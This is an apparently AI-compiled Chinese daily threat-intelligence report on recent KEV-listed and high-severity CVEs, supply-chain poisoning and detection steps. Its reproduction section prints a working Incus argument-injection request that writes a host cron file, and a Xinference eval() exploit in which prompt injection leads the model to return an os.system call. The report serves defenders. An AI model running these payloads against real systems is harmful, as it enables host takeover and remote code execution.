每日安全情报报告 · 2026-08-23

每日安全情报报告 · 2026-08-23

由 AI 整理发布

数据覆盖窗口:2026-08-21 ~ 2026-08-23(近 24--48 小时新增 / 在野动态)

重点标注 🔴 在野利用(KEV)、🟠 高危未野、🟡 已修复/澄清


一、本期风险概览

过去 48 小时,CISA 又将 Zimbra(CVE-2026-73570)TrueConf Server 双漏洞(CVE-2026-72529 / CVE-2026-72530) 列入 KEV,均确认在野利用,且涉及邮件基础设施与视频会议基础设施,供应链与身份平面风险同步走高。AI 基础设施持续成为高危爆发点:Incus(CVSS 9.9)Xinference(CVSS 10.0) 相继公开 PoC / 技术复现;Azure SQL Database(CVSS 10.0) 曝 SSRF 提权。供应链侧,Rust 三 crate 与 14 个 npm 包被投毒,AI 驱动后门(RedC2 4.0 / RedShell)进入依赖图即触发。

风险级别 数量 代表项
🔴 在野利用(KEV) 4 簇 Zimbra、TrueConf×2、macOS 屏幕共享、Windows IKE
🟠 高危(PoC/技术复现) 5 Incus、Xinference、Azure SQL、Citrix NetScaler×2、miniOrange SAML×2
🟡 已修复/澄清 2 Entra ID(更正未利用)、Rust/npm 供应链

二、最新高危漏洞(近 24--48 小时)

🔴 CVE-2026-73570 --- Zimbra Collaboration Suite 未认证 OS 命令注入(在野 / KEV)

  • 漏洞类型:OS 命令注入(CWE-78)
  • 受影响组件 :Zimbra Collaboration Suite(ZCS)< 10.1.20,且安装 zimbra-snmp 并启用 SNMP 通知(snmp_notify 参数 + swatchdog 服务,后者默认开启)
  • CVSS:8.9(High)
  • 在野利用 :✅ CISA 于 2026-08-21 列入 KEV,波兰 CERT(CERT Polska)确认活跃利用;联邦修复截止 2026-08-24(3 天窗口)
  • 利用路径 :攻击者发送特制 SMTP 请求,经由 SNMP 通知处理流程将恶意字符串注入 swatchdog,以 zimbra 用户权限执行任意系统命令(无需认证、SMTP 可达即可)
  • 影响面 :Shadowserver 统计全球 12,100+ 台 Zimbra 服务器暴露互联网;邮件服务器失陷等于交出邮箱凭证与内网入口
  • 参考链接CISA KEV 目录 · CERT Polska 利用预警 · Zimbra 修复版本 10.1.20 · 中文编译(代码卫士)

🔴 CVE-2026-72529 / CVE-2026-72530 --- TrueConf Server 双漏洞(在野 / KEV,Head Mare)

  • 漏洞类型:CVE-2026-72529 缺失认证(调用未文档化函数执行脚本)/ CVE-2026-72530 代码注入(沙箱逃逸至宿主机)
  • 受影响组件:TrueConf Server < 5.3.9 / 5.4.9 / 5.5.5(含 2022 年以来全部版本),经 TCP/4307 可达
  • CVSS :CVE-2026-72529 9.8 (厂商)/ 9.3(NVD);CVE-2026-72530 9.0(厂商)/ 9.5(NVD)
  • 在野利用 :✅ CISA 于 2026-08-20 列入 KEV,亲乌黑客行动组织 Head Mare 至少自 2026-07 起利用,替换客户端安装器投递 PhantomCore 后门;联邦截止 CVE-2026-72529 为 2026-08-23(今日) 、CVE-2026-72530 为 2026-09-03
  • 攻击链:TCP/4307 直达 → 未认证调用未文档化函数执行脚本(72529)→ 逃逸隔离环境执行宿主机命令(72530)→ 部署 WebShell、篡改数据库、替换合法客户端安装器
  • 参考链接CISA KEV 目录 · TrueConf 官方安全公告 · BleepingComputer 报道 · Security Affairs 攻击链分析

🔴 CVE-2026-65400 --- Apple macOS 屏幕共享预认证 RCE(在野 / KEV)

  • 漏洞类型:不当认证(CWE-287),网络攻击者可在无有效凭证下认证到屏幕共享
  • 受影响组件:macOS Sequoia 15.7.9 / Sonoma 14.8.9 / Tahoe 26.6.1 之前
  • CVSS:9.8(Critical)
  • 在野利用 :✅ CISA 于 2026-08-18 列入 KEV(评分由 7.1 上调至 9.8),联邦截止 2026-09-01;Microsoft 遥测与 NCSC-NL 确认 root 级入侵 + 部署 XMRig 门罗币挖矿(SSH 持久化)
  • 现状 :约 4 万台开启屏幕共享(端口 5900)的主机暴露互联网,近半在美国;已有公开 PoC,Calif 研究人员用 AI Agent 4 小时内武器化 CVE-2026-65400 及伴随漏洞 CVE-2026-43760
  • 参考链接CISA KEV 目录 · NCSC-NL 咨询 · 威胁简报(检测 IoC)

🔴 CVE-2026-33824 --- Windows IKE 扩展双重释放(在野 / KEV,刚过截止)

  • 漏洞类型:双重释放(CWE-415),预认证 RCE(UDP 500/4500)
  • 受影响组件:Windows Internet Key Exchange (IKE) Extension
  • CVSS:9.8(Critical);EPSS 55.85%
  • 在野利用 :✅ CISA 于 2026-08-18 列入 KEV,联邦截止 2026-08-21(已逾期);中文背景 APT 结合 DeepSeek 自主攻击被指参与利用
  • 参考链接CISA KEV 目录 · CISA 8/18 四连发公告 · NVD 详情

🟠 CVE-2026-48755 --- Incus 备份压缩参数注入致主机文件写入 / RCE(PoC 公开)

  • 漏洞类型:参数注入(CWE-88)/ 输入验证不当(CWE-20)
  • 受影响组件:Incus(容器与 VM 管理器)< 7.2.0(GHSA 标注 7.1.0 修复,建议升 7.2.0)
  • CVSS:9.9(Critical)
  • PoC:✅ 公开(GitHub Security Advisory 含完整 Python PoC);多租户环境下容器逃逸即主机沦陷
  • 根因compression_algorithm 仅校验首 token,尾部参数直接拼接进 zstd -c ... 命令,可用 --pass-through -o 重定向写任意主机路径
  • 参考链接GitHub Advisory GHSA-v6mj-8pf4-hhw4 · SecureLayer7 技术复现 · vuln.today 概览

🟠 CVE-2026-61539 --- Xinference Llama3 工具调用 eval() RCE(CVSS 10.0)

  • 漏洞类型:动态求值代码注入(CWE-95,eval injection)
  • 受影响组件:Xinference(xorbitsai/inference)≤ 2.5.0(含至 < 2.7.0 的脆弱解析路径)
  • CVSS:10.0(Critical)
  • 利用条件 :默认配置无认证,向 /v1/chat/completions 发送含 tools 字段的请求,诱导模型返回 __import__('os').system('...') 形式的工具调用参数,服务端 eval() 直接执行
  • 发现:腾讯玄武实验室 XlabAI 团队 / Atuin 自动化漏洞发现引擎
  • 参考链接GitHub Advisory GHSA-x2rj-828p-hx9m · IONIX 技术分析 · NVD 详情 · 修复版本 v2.7.0

🟠 CVE-2026-69502 --- Azure SQL Database SSRF 提权(CVSS 10.0)

  • 漏洞类型:服务端请求伪造(SSRF)致权限提升(CWE-918)
  • 受影响组件:Microsoft Azure SQL Database
  • CVSS:10.0(Critical)
  • 风险:未认证攻击者经网络提升权限,潜在访问 Azure 内部基础设施或跨租户数据;云托管,微软控制修复时间线,暂无公开 PoC / 确认在野
  • 参考链接Enigma 每日威胁情报(2026-08-22)

🟠 CVE-2026-19489 / CVE-2026-19490 --- Citrix NetScaler ADC / Gateway 双漏洞(Critical)

  • 漏洞类型:CVE-2026-19489 内存溢出致 DoS(CWE-119);CVE-2026-19490 替代路径认证绕过(CWE-288)
  • 受影响组件:NetScaler ADC / Gateway 14.1 < 14.1-73.32、13.1 < 13.1-63.21(含 FIPS / NDcPP 变体)
  • CVSS :CVE-2026-19489 8.8(v4.0) ;CVE-2026-19490 9.3(v4.0)
  • 前置条件:19489 需启用 SIP ALG 的 LSN 组;19490 需配置为 Gateway(SSL VPN / ICA Proxy / CVPN / RDP Proxy)或 AAA vserver(新版需叠加 SAML action)
  • 参考链接Citrix 官方安全公告 CTX696939 · CERT-EU 咨询 · HKCERT 中文报道

🟠 CVE-2026-61979 / CVE-2026-15981 --- miniOrange SAML 2.0 (WordPress) 认证绕过

  • 漏洞类型:CVE-2026-61979 签名算法混淆(可伪造断言);CVE-2026-15981 误读 OpenSSL 错误码为有效
  • 受影响组件:miniOrange SAML 2.0 Single Sign On 插件(7 个独立版本线,仅免费版公开进漏洞库,6 个付费版长期未登记)
  • 风险:攻击者可伪造断言登录任意用户(含管理员);DigitalOcean 发现其以单一上架条目发布多版本线,导致付费版修复滞后
  • 参考链接Patchstack 披露 · CyberSecBrief 每日简报

🟡 CVE-2026-69836 --- Microsoft Entra ID 反序列化 RCE(已云端修复 / 更正未利用)

  • 漏洞类型:反序列化不可信数据(CWE-502),未认证网络 RCE
  • CVSS:10.0(Critical)
  • 最新状态 :2026-08-20 披露、一度标注"在野",2026-08-21 微软更正为未利用,已云端全量修复,无需客户打补丁;未入 KEV
  • 参考链接CyberRecaps 报道 · Help Net Security

三、漏洞 PoC 与复现(使用步骤)

⚠️ 以下命令仅供授权环境下的漏洞验证与防御性测试。请在可销毁的隔离环境运行,勿对未授权系统使用。

1. 🟠 Incus CVE-2026-48755(参数注入 → 主机文件写入 → 计划任务 RCE)

PoC 来源GitHub Advisory GHSA-v6mj-8pf4-hhw4(含完整 Python 利用脚本)

复现思路(单请求 curl 版,等价于官方 PoC)

bash 复制代码
# 0. 依赖:任意可访问 Incus API 的客户端(需备份权限的已认证 cert/key)
# 1. 准备恶意计划任务内容并推入实例
incus file push /tmp/cron_payload.sh c01/incus-zstd-cron

# 2. 触发备份,注入压缩算法参数(zstd --pass-through 重定向写主机路径)
curl -sk --cert ~/.config/incus/client.crt --key ~/.config/incus/client.key \
  -X POST https://remote-incus:8443/1.0/instances/c01/backups \
  -H 'Content-Type: application/json' \
  -d '{
    "compression_algorithm": "zstd -d -f --pass-through -o /etc/cron.d/incus-zstd-rce -- /var/lib/incus/storage-pools/default/containers/c01/rootfs/incus-zstd-cron",
    "instance_only": true
  }'
# 3. 检查主机 /etc/cron.d/incus-zstd-rce 是否被写入 ⇒ 主机文件写入原语成立

修复 :升级 Incus ≥ 7.2.0(仅允许单独二进制名,拒绝多余参数);无临时绕过,须吊销不可信客户端的 API 访问。

参考SecureLayer7 复现 · vuln.today

2. 🟠 Xinference CVE-2026-61539(eval() 注入 RCE)

PoC 来源GitHub Advisory GHSA-x2rj-828p-hx9m

复现(Python requests,仅验证执行 touch /tmp/hacked

bash 复制代码
# 依赖
pip install requests xinference   # 本地起一个 ≤2.5.0 的测试实例

# 构造"工具调用"负载,使模型输出被 eval() 执行
python3 - <<'PY'
import requests
url = "http://target:9997/v1/chat/completions"
payload = {
    "model": "your-llama3-model",
    "messages": [{"role": "user", "content": "call the tool"}],
    "tools": [{
        "type": "function",
        "function": {
            "name": "demo",
            "parameters": {"type": "object", "properties": {}}
        }
    }],
    # 通过 prompt injection 让模型返回如下 tool-call 参数:
    # __import__('os').system('touch /tmp/hacked')
}
r = requests.post(url, json=payload)
print(r.text)
PY
# 验证:目标主机出现 /tmp/hacked 即证明 eval 注入可达

修复 :升级 Xinference ≥ 2.7.0;临时缓解------禁止将 /v1/chat/completions 暴露公网、关闭 Llama3 工具调用、以最小权限 + 容器隔离运行。

参考IONIX 技术分析 · 修复版本 v2.7.0

3. 🔴 Zimbra CVE-2026-73570(无公开武器化 PoC,提供检测 / 狩猎 IoC)

防御侧排查(CERT Polska 指引)

bash 复制代码
# 1. 检查 zimbra 服务异常启停(恶意负载触发 "stopped→running" 或 "running→stopped")
grep -E "szkodliwy|malicious" /var/log/zimbra.log

# 2. 排查 zimbra 用户近 30 天在以下目录新建的文件
find /opt/zimbra/jetty/webapps/ /opt/zimbra/jetty_base/webapps/ /tmp/ \
  -user zimbra -type f -mtime -30 -ls

修复 :升级至 ZCS 10.1.20+;紧急时可关闭 SNMP 通知功能并严控 SMTP 入站;发现可疑即保全日志、隔离主机、轮换凭证。

参考CERT Polska 预警 · Gridinsoft 响应清单

4. 🔴 macOS 屏幕共享 CVE-2026-65400(公开 PoC,提供检测要点)

公开 PoC :已存在(Calif 研究者 AI 武器化,4 小时);公开检测狩猎清单见 AJ King 威胁简报

bash 复制代码
# 网络层:阻断来自不可信 IP 的 5900 入站
# 终端检测(EDR / 统一日志):
log show --predicate 'subsystem == "com.apple.screensharing"' --last 7d | grep -i "root"
# 排查隐藏 XMRig:
ls -la ~/Library/Application\ Support/.config/sysmond 2>/dev/null
# 排查异常 SSH 公钥 / pfctl 规则变更 / ad-hoc 签名二进制

修复:升级至 macOS Sequoia 15.7.9 / Sonoma 14.8.9 / Tahoe 26.6.1+;关闭不必要的屏幕共享公网暴露。

5. 🔴 TrueConf CVE-2026-72529 / CVE-2026-72530(无公开 PoC,提供检测 + 加固)

bash 复制代码
# 资产排查:扫描内网 4307/TCP 监听(含"被遗忘"的部署)
nmap -p 4307 --open 10.0.0.0/8

# 版本确认(需 ≥ 5.3.9 / 5.4.9 / 5.5.5)
# 检测入侵:locale.php 篡改、WebShell、异常服务、GitHub C2 流量、TrueConf 协议异常

修复 :升级至厂商指定修复版;网络层立即限制 4307/TCP 仅管理 VLAN / 零信任网关可达;假设已失陷,执行完整事件响应与凭证轮换。

参考Shield53 KEV 预警 · The IT Guys 攻击链


四、供应链与威胁情报

  • 🟠 Rust 供应链投毒(CVSS 9.8) :攻击者在 crates.io 劫持维护者账号,向 arrayref 0.3.10internment 0.8.7append-only-vec 0.1.9 注入 proc-macro1 构建期投递器(Dropper),构建期即执行、极难检测,归因朝鲜(Sapphire Sleet)。审计 Cargo.lock、使用 cargo-audit / cargo-vet、从干净环境重建并轮换构建期可接触凭证。来源:NCSC-FI 预警 · CyberSecBrief 综述
  • 🟠 14 个 npm 包投递 RedC2 4.0 Linux 后门(RedShell) :包名伪装为日历 / 连胜统计工具(如 streak-metrics-mathmap-streak-kit 等),import 即触发 ,绕过 --ignore-scripts,由 Red Agent(自然语言转后渗透命令的 AI 助手)驱动。来源:CyberRecaps 报道 · Trend AI Security
  • 🟡 仍在窗口期的 8/18 四连 KEV (联邦 8/21 截止已逾期,但资产仍高危):Windows IKE CVE-2026-33824、VMware vCenter 路径遍历 CVE-2026-59310(47 国 361 IP,Babuk 衍生勒索)、SharePoint 弱认证 CVE-2026-55040(Rapid7 PoC 后已遭在野)、macOS 屏幕共享 CVE-2026-65400。来源:CISA 8/18 公告

五、网络安全最新文章(附链接)

  1. Zimbra 严重 RCE 漏洞正遭在野利用 --- FreeBuf 早报(含 AI Agent 攻破 Snowflake、Cloudflare Workers Spectre、Operation CameraSwarm 等 8-22 速报)
  2. Critical Zimbra RCE flaw now actively exploited in attacks --- zeroday.news(CERT Polska 预警全文)
  3. CISA Adds Zimbra CVE-2026-73570 to KEV Catalog(三日修复窗口) --- Metrotechs
  4. TrueConf Server Exploitation: PhantomCore Delivered via CVE-2026-72529 / 72530 --- Security Affairs
  5. CISA orders feds to patch actively exploited TrueConf Server flaws --- BleepingComputer
  6. CVE-2026-48755: Incus Argument Injection → RCE(含复现) --- SecureLayer7 Lab
  7. CVE-2026-61539 -- Unauthenticated RCE in Xinference(eval 注入) --- IONIX Threat Center
  8. Critical Citrix NetScaler Flaw Lets Remote Attackers Bypass Authentication --- HKCERT
  9. macOS Screen Sharing Pre-Auth RCE Exploited for Cryptojacking(CVE-2026-65400) --- AJ King 威胁简报
  10. 14 trojanized npm packages drop RedC2 Linux backdoor --- CyberRecaps
  11. Critical Entra ID RCE CVE-2026-69836 exploited in wild(后更正未利用) --- CyberRecaps
  12. Daily Threat Intelligence Digest -- August 22, 2026(含 Incus / Xinference / Azure SQL / Zimbra KEV / Rust 供应链) --- Enigma Global

部分内容由 AI 辅助生成

相关推荐
Flag在我手里2 小时前
【春秋云境】CVE-2022-30887
文件上传·cve·蚁剑·春秋云境
大方子4 小时前
【PolarCTF】ezjava
网络安全·polarctf
网安蟹佬霸5 小时前
SSRF服务端请求伪造攻防实战:从内网穿透到云元数据利用
sql·web安全·网络安全·自动化·网安
白猫不黑5 小时前
AI Agent自动化渗透测试实战:从原理到红队实践
运维·人工智能·web安全·网络安全·信息安全·渗透测试·自动化
小网洞19 小时前
免费WPA无线握手包在线分析跑包网站
网络·网络安全·密码学·wps
sbjdhjd1 天前
CTF 技术复盘:从参数类型绕过到正则回溯 | Merry Christmas PHP CTF(gift.php & gift_plus.php)
安全·网络安全·云计算·php·ctf·红队·网络攻防
Chengbei112 天前
DSH渗透测试插件dsh-pentest全新升级!适配DeepSeek Harness,可视化探索链路,一键搭建轻量化AI渗透测试环境。
人工智能·web安全·网络安全·微信·小程序·系统安全·安全架构
Latticy2 天前
vulnhub系列靶机-mrRobot
web安全·网络安全·渗透测试
白猫不黑2 天前
网络安全/信息安全专业学习路线与入行指南:从大学到岗位的完整规划
网络·学习·安全·web安全·网络安全·黑客技术